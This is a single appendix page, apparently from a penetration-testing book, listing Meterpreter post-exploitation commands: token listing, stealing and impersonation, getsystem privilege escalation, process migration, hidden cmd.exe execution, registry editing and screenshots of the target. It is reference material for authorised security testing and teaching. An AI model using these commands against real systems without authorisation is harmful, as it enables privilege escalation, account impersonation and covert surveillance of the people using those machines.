278
Appendix B
use priv
Load the privilege extension for extended Meterpreter libraries.
ps
Show all running processes and which accounts are associated with each
process.
migrate
PID
Migrate to the specific process ID (PID is the target process ID gained
from the
ps
command).
use incognito
Load
incognito
functions. (Used for token stealing and impersonation on
a target machine.)
list_tokens -u
List available tokens on the target by user.
list_tokens -g
List available tokens on the target by group.
impersonate_token DOMAIN_NAME\\USERNAME
Impersonate a token available on the target.
steal_token
PID
Steal the tokens available for a given process and impersonate that token.
drop_token
Stop impersonating the current token.
getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple
attack vectors.
shell
Drop into an interactive shell with all available tokens.
execute -f cmd.exe -i
Execute
cmd.exe
and interact with it.
execute -f cmd.exe -i -t
Execute
cmd.exe
with all available tokens.
execute -f cmd.exe -i -H -t
Execute
cmd.exe
with all available tokens and make it a hidden process.
rev2self
Revert back to the original user you used to compromise the target.
reg
command
Interact, create, delete, query, set, and much more in the target’s registry.
setdesktop
number
Switch to a different screen based on who is logged in.
screenshot
Take a screenshot of the target’s screen.